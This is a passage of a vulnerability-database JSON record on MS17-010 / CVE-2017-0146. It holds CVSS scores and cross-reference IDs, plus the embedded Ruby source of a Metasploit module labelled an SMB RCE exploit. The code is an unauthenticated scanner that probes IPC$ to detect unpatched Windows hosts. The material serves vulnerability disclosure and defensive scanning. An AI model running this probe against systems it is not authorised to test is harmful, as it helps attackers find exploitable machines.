{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0146"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-04-14T05:32:32", "rev": 2, "value": 9.3, "vector": "NONE"}}, "hash": "64e46c7b1840d7210cbf47ecda6ac296bd6891343803ded8f1f12038ae77e175", "hashmap": [{"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "501b99596c4a2791b470cf17dc7209c2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "a74ddd3940ba1da67e7250cb861f505d", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "68b329da9893e34099c7d8ad5cb9c940", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "501b99596c4a2791b470cf17dc7209c2", "key": "modified"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}], "history": [], "href": "", "id": "MSF:ILITIES/MSFT-CVE-2017-0146/", "immutableFields": [], "lastseen": "2021-04-14T05:32:32", "modified": "1976-01-01T00:00:00", "objectVersion": "1.5", "published": "1976-01-01T00:00:00", "references": [], "reporter": "Rapid7", "title": "Microsoft CVE-2017-0146: Windows SMB Remote Code Execution Vulnerability", "type": "metasploit", "viewCount": 17}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-04-14T05:32:32"}], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "symantec", "idList": ["SMNTC-96707"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-14T05:32:32", "rev": 2}, "score": {"value": 9.3, "vector": "NONE", "modified": "2021-04-14T05:32:32", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "", "sourceData": "", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "cde40a13c5d43ca610b08893c2bdb748"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "68b329da9893e34099c7d8ad5cb9c940"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "501b99596c4a2791b470cf17dc7209c2"}, {"key": "published", "hash": "501b99596c4a2791b470cf17dc7209c2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "a74ddd3940ba1da67e7250cb861f505d"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}], "exploitdb": [{"id": "EDB-ID:41891", "hash": "124b185062eb16f7ee569eb946c4e2fb5aa0b1d2cff47a39932d9aff1f4fe4b2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit)", "description": "Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,...", "published": "2017-04-17T00:00:00", "modified": "2017-04-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.exploit-db.com/exploits/41891/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2017-04-18T17:18:01", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Microsoft Windows - Uncredentialed SMB RCE (MS17-010) (Metasploit). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148. Dos ...", "enchantments": {}, "hash": "94d82bf5ff171f8185f38e4d5f177d8a65c4cd34b9ae01cb73ec2175b102c55d", "history": [], "href": "https://www.exploit-db.com/exploits/41891/", "id": "EDB-ID:41891", "lastseen": "2017-04-17T19:17:58", "modified": "2017-04-17T00:00:00", "objectVersion": "1.4", "osvdbidlist": [], "published": "2017-04-17T00:00:00", "references": [], "reporter": "Exploit-DB", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# auxiliary/scanner/smb/smb_ms_17_010\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 SMB RCE Detection',\r\n 'Description' => %q{\r\n Uses information disclosure to determine if MS17-010 has been patched or not.\r\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\r\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\r\n not have the MS17-010 patch.\r\n\r\n This module does not require valid SMB credentials in default server\r\n configurations. It can log on as the user \"\\\" and connect to IPC$.\r\n },\r\n 'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-0143'],\r\n [ 'CVE', '2017-0144'],\r\n [ 'CVE', '2017-0145'],\r\n [ 'CVE', '2017-0146'],\r\n [ 'CVE', '2017-0147'],\r\n [ 'CVE', '2017-0148'],\r\n [ 'MSB', 'MS17-010'],\r\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\r\n ],\r\n 'License' => MSF_LICENSE\r\n ))\r\n end\r\n\r\n def run_host(ip)\r\n begin\r\n status = do_smb_probe(ip)\r\n\r\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\r\n print_warning(\"Host is likely VULNERABLE to MS17-010!\")\r\n report_vuln(\r\n host: ip,\r\n name: self.name,\r\n refs: self.references,\r\n info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$'\r\n )\r\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\r\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\r\n print_good(\"Host does NOT appear vulnerable.\")\r\n else\r\n print_bad(\"Unable to properly detect if host is vulnerable.\")\r\n end\r\n\r\n rescue ::Interrupt\r\n print_status(\"Exiting on interrupt.\")\r\n raise $!\r\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\r\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\r\n rescue ::Exception => e\r\n vprint_error(\"#{e.class}: #{e.message}\")\r\n ensure\r\n disconnect\r\n end\r\n end\r\n\r\n def do_smb_probe(ip)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\r\n simple.connect(ipc_share)\r\n tree_id = simple.shares[ipc_share]\r\n\r\n print_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\r\n\r\n # request transaction with fid = 0\r\n pkt = make_smb_trans_ms17_010(tree_id)\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n # convert error code to string\r\n code = pkt['SMB'].v['ErrorClass']\r\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\r\n status = smberr.get_error(code)\r\n\r\n print_status(\"Received #{status} with FID = 0\")\r\n status\r\n end\r\n\r\n def make_smb_trans_ms17_010(tree_id)\r\n # make a raw transaction packet\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n # opcode 0x23 = PeekNamedPipe, fid = 0\r\n setup = \"\\x23\\x00\\x00\\x00\"\r\n setup_count = 2 # 2 words\r\n trans = \"\\\\PIPE\\\\\\x00\"\r\n\r\n # calculate offsets to the SetupData payload\r\n base_offset = pkt.to_s.length + (setup.length) - 4\r\n param_offset = base_offset + trans.length\r\n data_offset = param_offset # + 0\r\n\r\n # packet baselines\r\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\r\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload'].v['ParamCountMax'] = 0xffff\r\n pkt['Payload'].v['DataCountMax'] = 0xffff\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n\r\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup\r\n pkt['Payload'].v['Payload'] = trans\r\n\r\n pkt.to_s\r\n end\r\nend\r\n", "sourceHref": "https://www.exploit-db.com/download/41891/", "title": "Microsoft Windows - Uncredentialed SMB RCE (MS17-010) (Metasploit)", "type": "exploitdb", "viewCount": 63}, "differentElements": ["description", "title"], "edition": 1, "lastseen": "2017-04-17T19:17:58"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit). CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,...", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-04-18T17:18:01", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-04-18T17:18:01", "rev": 2, "value": 7.9, "vector": "NONE"}}, "hash": "1491f9bbdcecfd0681eee2f7d6d662f9dd08f7fcc4d15286fbaa3dc1ef9f0d08", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "083a04e7fee2ce4aff868e260be7632a", "key": "title"}, {"hash": "0271fb8c6c010b2aca15217429c7c0eb", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c2121915ced0b840e29b29907ddf10ee", "key": "href"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "c80c514f16b0e9853484027f63256907", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "0271fb8c6c010b2aca15217429c7c0eb", "key": "modified"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}], "history": [], "href": "https://www.exploit-db.com/exploits/41891/", "id": "EDB-ID:41891", "immutableFields": [], "lastseen": "2017-04-18T17:18:01", "modified": "2017-04-17T00:00:00", "objectVersion": "1.5", "published": "2017-04-17T00:00:00", "references": [], "reporter": "Exploit-DB", "title": "Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit)", "type": "exploitdb", "viewCount": 1322}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-04-18T17:18:01"}], "viewCount": 1368, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", 